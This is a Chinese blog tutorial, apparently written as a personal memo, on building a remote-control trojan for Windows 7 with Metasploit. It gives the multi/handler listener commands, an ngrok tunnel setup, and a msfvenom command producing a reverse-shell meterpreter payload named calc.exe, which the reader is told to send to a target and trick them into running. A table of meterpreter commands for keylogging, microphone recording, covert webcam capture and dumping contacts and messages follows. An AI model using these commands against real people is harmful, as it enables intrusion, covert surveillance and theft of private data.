本文于2019-03-19创作,原标题为“msf生成远控木马及免杀初探”
2019-12-27重写,删除了包括安卓的部分,只测试win7远控的效果


介绍

远控也就是远程控制,是通过使用户点击我们准备好的远控木马达到控制用户电脑的效果

基础材料:

  • Kali 2019.4
  • Win7 SP1
  • ngrok免费服务器一台

此外,ngrok不是唯一远控服务器端,你的kali布置在外网就不用中间商,或者你也可以自己搭建类似的内网穿透服务器

本文只是基础教程,做备忘录用

过程

在msf中

直接快速后台监听

handler -H 192.168.2.6 -P 8080 -p windows/x64/meterpreter/reverse_tcp

可使用

jobs

命令查看后台任务,或者按照正常流程来:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.2.6(本地kali的ip)
set LPORT 8080(本地监听的端口)
set ExitOnSession false(防止假session)
exploit -j -z(-j为后台任务,-z为持续监听)

在ngrok中

官网注册并开通一个免费隧道

ngrok的端口可以随便填一个大于1024的就行,这个填了不能修改

本地的ip和端口就是上面设置的kali本机的ip和端口,后期是可以修改的

申请成功后在kali本机上下载ngrok的客户端

解压后在文件夹内新开一个终端,使用命令:

./sunny clientid 你的隧道id

就可以开始监听了:

ngrok的基础操作在以前的文章:《WinRAR 目录穿越漏洞 - CVE-2018-20250 复现》也有写过

生成木马的部分

监听部分完成了就可以开始生成木马传给目标主机了

在终端中输入以下命令:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ngrok免费服务器地址(不包括前面的协议) LPORT=ngrok申请时填的端口 -f exe -o calc.exe

就可以生成一个最基础的,无免杀的远控木马:

将这个木马传给目标主机并诱骗点击,在msf中则可以获取到meterpreter会话:

可能会不稳定,这就取决于网络连接状况和免杀效果了,现在的payload是一定会被360和火绒拦截的

附上meterpreter的常用操作命令:

命令功能
keyscan_start开始键盘记录
keyscan_stop结束键盘记录
keyscan_dump下载键盘记录
record_mic录制声音(如果目标主机上有话筒的话)
screenshot截屏
webcam_chat查看摄像头接口
webcam_list查看摄像头列表
webcam_stream开启摄像头
webcam_snap隐秘拍照功能 -i num指定开启哪个摄像头
run vnc开启远程桌面
dump_contacts导出电话号码
dump_sms导出信息
可以输入?查看更多命令

本文完。

最后修改:2019 年 12 月 27 日
如果觉得我的文章对你有用,请随意赞赏